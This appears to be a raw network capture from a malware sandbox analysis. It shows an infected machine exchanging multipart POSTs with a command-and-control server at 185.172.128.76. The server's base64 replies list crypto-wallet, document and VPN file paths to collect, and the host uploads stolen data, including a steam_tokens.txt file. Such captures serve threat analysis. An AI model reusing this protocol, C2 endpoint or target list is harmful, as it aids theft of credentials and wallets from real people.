Apr 27, 2024 01:32:05.949537039 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJJJJDHIDBGHIDHIDAFB Host: 185.172.128.76 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 01:32:06.258733034 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 23:32:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 01:32:06.365636110 CEST	468	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIJEGDBGDBFIJKECBAKF Host: 185.172.128.76 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 35 37 36 63 63 62 64 30 31 30 64 35 64 62 37 64 31 61 33 32 35 36 31 63 39 66 31 36 63 36 64 34 64 62 62 33 39 66 62 65 30 39 62 63 36 33 63 35 63 38 37 38 64 65 36 33 30 34 36 34 33 64 36 34 65 36 31 66 62 38 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 2d 2d 0d 0a Data Ascii: ------HIJEGDBGDBFIJKECBAKFContent-Disposition: form-data; name="token"8f576ccbd010d5db7d1a32561c9f16c6d4dbb39fbe09bc63c5c878de6304643d64e61fb8------HIJEGDBGDBFIJKECBAKFContent-Disposition: form-data; name="message"wallets------HIJEGDBGDBFIJKECBAKF--
Apr 27, 2024 01:32:06.644071102 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 23:32:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 2408 Connection: keep-alive Vary: Accept-Encoding Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8XE11 [TRUNCATED]
Apr 27, 2024 01:32:06.651850939 CEST	466	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGIDBFBFHJDGCAKEGHJE Host: 185.172.128.76 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 47 49 44 42 46 42 46 48 4a 44 47 43 41 4b 45 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 35 37 36 63 63 62 64 30 31 30 64 35 64 62 37 64 31 61 33 32 35 36 31 63 39 66 31 36 63 36 64 34 64 62 62 33 39 66 62 65 30 39 62 63 36 33 63 35 63 38 37 38 64 65 36 33 30 34 36 34 33 64 36 34 65 36 31 66 62 38 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 42 46 42 46 48 4a 44 47 43 41 4b 45 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 42 46 42 46 48 4a 44 47 43 41 4b 45 47 48 4a 45 2d 2d 0d 0a Data Ascii: ------EGIDBFBFHJDGCAKEGHJEContent-Disposition: form-data; name="token"8f576ccbd010d5db7d1a32561c9f16c6d4dbb39fbe09bc63c5c878de6304643d64e61fb8------EGIDBFBFHJDGCAKEGHJEContent-Disposition: form-data; name="message"files------EGIDBFBFHJDGCAKEGHJE--
Apr 27, 2024 01:32:06.938599110 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 23:32:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 2052 Connection: keep-alive Vary: Accept-Encoding Data Raw: 52 45 56 54 53 33 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 5a 47 39 6a 65 43 77 71 4c 6e 68 73 63 33 68 38 4e 58 77 78 66 44 46 38 52 45 56 54 53 33 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6e 42 75 5a 79 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 5a 47 59 73 4b 6d 4a 68 59 32 74 31 63 43 6f 75 63 47 35 6e 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 6b 5a 69 77 71 63 6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 35 6e 4c 43 70 79 5a 57 4e 76 64 6d 56 79 4b 69 35 77 5a 47 59 73 4b 6d 31 6c 64 47 46 74 59 58 4e 72 4b 69 34 71 4c 43 70 56 56 45 4d 74 4c 53 6f 75 4b 6e 77 78 4e 54 41 77 66 44 46 38 4d 58 78 45 54 30 4e 54 66 43 56 45 54 30 4e 56 54 55 56 4f 56 46 4d 6c 58 48 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 62 6d 63 73 4b 6e 64 68 62 47 78 6c 64 43 6f 75 63 47 52 6d 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 75 5a 79 77 71 59 6d 46 6a 61 33 56 77 4b 69 35 77 5a 47 59 73 4b 6e 4a 6c 59 32 39 32 5a 58 49 71 4c 6e 42 75 5a 79 [TRUNCATED] Data Ascii: REVTS3wlREVTS1RPUCVcfCoudHh0LCouZG9jeCwqLnhsc3h8NXwxfDF8REVTS3wlREVTS1RPUCVcfCp3YWxsZXQqLnBuZywqd2FsbGV0Ki5wZGYsKmJhY2t1cCoucG5nLCpiYWNrdXAqLnBkZiwqcmVjb3ZlcioucG5nLCpyZWNvdmVyKi5wZGYsKm1ldGFtYXNrKi4qLCpVVEMtLSouKnwxNTAwfDF8MXxET0NTfCVET0NVTUVOVFMlXHwqd2FsbGV0Ki5wbmcsKndhbGxldCoucGRmLCpiYWNrdXAqLnBuZywqYmFja3VwKi5wZGYsKnJlY292ZXIqLnBuZywqcmVjb3ZlcioucGRmLCptZXRhbWFzayouKiwqVVRDLS0qLip8MTUwMHwxfDF8RE9DU3wlRE9DVU1FTlRTJVx8Ki50eHQsKi5kb2N4LCoueGxzeHw1fDF8MXxSRUN8JVJFQ0VOVCVcfCoudHh0LCouZG9jeCwqLnhsc3h8NXwxfDF8UkVDfCVSRUNFTlQlXHwqd2FsbGV0Ki5wbmcsKndhbGxldCoucGRmLCpiYWNrdXAqLnBuZywqYmFja3VwKi5wZGYsKnJlY292ZXIqLnBuZywqcmVjb3ZlcioucGRmLCptZXRhbWFzayouKiwqVVRDLS0qLip8MTUwMHwxfDF8Tk9URVBBRHwlQVBQREFUQSVcTm90ZXBhZCsrXHwqLnhtbHwxNXwxfDF8Tk9URVBBRHwlQVBQREFUQSVcTm90ZXBhZCsrXGJhY2t1cFx8Ki4qfDE1fDF8MXxTVUJMSU1FfCVBUFBEQVRBJVxTdWJsaW1lIFRleHQgM1xMb2NhbFxTZXNzaW9uLnN1YmxpbWVfc2Vzc2lvblx8Ki5zdWJsaW1lXyp8MTV8MXwxfFZQTl9DaXNjb1ZQTnwlUFJPR1JBTUZJTEVTJVxcLi5cXFByb2dyYW1EYXRhXFxDaXNjb1xDaXNjbyBBbnlDb25uZWN0IFNlY3VyZSBN [TRUNCATED]
Apr 27, 2024 01:32:06.993628979 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJEHCGDBFCBAKECBKKEB Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 01:32:07.304008961 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 23:32:07 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 01:32:07.316364050 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHDHJEBFBFHJECAKFCAA Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 01:32:07.622807026 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 23:32:07 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 01:32:09.115694046 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGIDBKKKKKFBGDGDHIDB Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 01:32:09.421427011 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 23:32:09 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 01:32:09.518847942 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHIIIJDAAAAAAKECBFBA Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 01:32:09.820143938 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 23:32:09 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 01:32:10.071856976 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHIDGDHCGCBAKFHIIIII Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 01:32:10.374001980 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 23:32:10 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 01:32:10.510464907 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIIIECBGDHJJKFIDAKJD Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 01:32:10.813869953 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 23:32:10 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 01:32:10.834996939 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCAAEHJDBKJJKFHJEBKF Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 01:32:11.137269974 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 23:32:11 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 01:32:11.197149038 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBAAAFBGDBKKEBGCFCBF Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 01:32:11.502537966 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 23:32:11 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 01:32:11.582150936 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IECAFHDBGHJKFIDHJJJE Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 01:32:11.882704020 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 23:32:11 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 01:32:11.910815954 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJKJKKKJJJKJKFHJJJJE Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 01:32:12.222513914 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 23:32:12 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 01:32:13.590199947 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHIIIJDAAAAAAKECBFBA Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 01:32:13.894031048 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 23:32:13 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 01:32:14.365943909 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFIEGDAEHIEHIDHJDAAK Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 01:32:14.672225952 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 23:32:14 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 01:32:14.779171944 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FBAKEHIEBKJJJJJKKKEG Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 01:32:15.104398012 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 23:32:15 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 01:32:15.111175060 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHDAAECAEBKJKFHJKECF Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 01:32:15.417761087 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 23:32:15 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 01:32:15.450362921 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGIJECFIECBFIDGDAKFH Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 01:32:15.760030985 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 23:32:15 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 01:32:15.993558884 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBGIDGCAFCBKECAAKJJK Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 01:32:16.299725056 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 23:32:16 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 01:32:16.518019915 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBKEHJJDAAAAKECBGHDA Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 01:32:16.832190990 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 23:32:16 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 01:32:17.050988913 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCBKFBFCGIEHIDGCFBFB Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 01:32:17.364259005 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 23:32:17 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 01:32:17.370505095 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIJEGDBGDBFIJKECBAKF Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 01:32:17.675612926 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 23:32:17 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 01:32:17.683614969 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIDHCFBAKFBGDGDHJKJJ Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 01:32:17.991317034 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 23:32:17 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 01:32:18.003930092 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBGIDGCAFCBKECAAKJJK Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 01:32:18.335158110 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 23:32:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 01:32:18.346221924 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHIECBAFBFHIJKFIJDAK Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 01:32:18.648247004 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 23:32:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 01:32:18.656056881 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGIDBFBFHJDGCAKEGHJE Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 01:32:18.962477922 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 23:32:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 01:32:18.988709927 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJEHCGDBFCBAKECBKKEB Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 01:32:19.290983915 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 23:32:19 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 01:32:19.336461067 CEST	564	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHIECBAFBFHIJKFIJDAK Host: 185.172.128.76 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 48 49 45 43 42 41 46 42 46 48 49 4a 4b 46 49 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 35 37 36 63 63 62 64 30 31 30 64 35 64 62 37 64 31 61 33 32 35 36 31 63 39 66 31 36 63 36 64 34 64 62 62 33 39 66 62 65 30 39 62 63 36 33 63 35 63 38 37 38 64 65 36 33 30 34 36 34 33 64 36 34 65 36 31 66 62 38 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 45 43 42 41 46 42 46 48 49 4a 4b 46 49 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 45 43 42 41 46 42 46 48 49 4a 4b 46 49 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------FHIECBAFBFHIJKFIJDAKContent-Disposition: form-data; name="token"8f576ccbd010d5db7d1a32561c9f16c6d4dbb39fbe09bc63c5c878de6304643d64e61fb8------FHIECBAFBFHIJKFIJDAKContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------FHIECBAFBFHIJKFIJDAKContent-Disposition: form-data; name="file"------FHIECBAFBFHIJKFIJDAK--
Apr 27, 2024 01:32:19.646888971 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 23:32:19 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 01:32:19.763180017 CEST	204	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKJKJEHJJDAKECBFCGID Host: 185.172.128.76 Content-Length: 112219 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 01:32:20.397547007 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 23:32:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 01:32:20.436135054 CEST	469	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIIIECBGDHJJKFIDAKJD Host: 185.172.128.76 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 35 37 36 63 63 62 64 30 31 30 64 35 64 62 37 64 31 61 33 32 35 36 31 63 39 66 31 36 63 36 64 34 64 62 62 33 39 66 62 65 30 39 62 63 36 33 63 35 63 38 37 38 64 65 36 33 30 34 36 34 33 64 36 34 65 36 31 66 62 38 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 68 65 72 37 68 34 38 72 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 44 2d 2d 0d 0a Data Ascii: ------GIIIECBGDHJJKFIDAKJDContent-Disposition: form-data; name="token"8f576ccbd010d5db7d1a32561c9f16c6d4dbb39fbe09bc63c5c878de6304643d64e61fb8------GIIIECBGDHJJKFIDAKJDContent-Disposition: form-data; name="message"her7h48r------GIIIECBGDHJJKFIDAKJD--
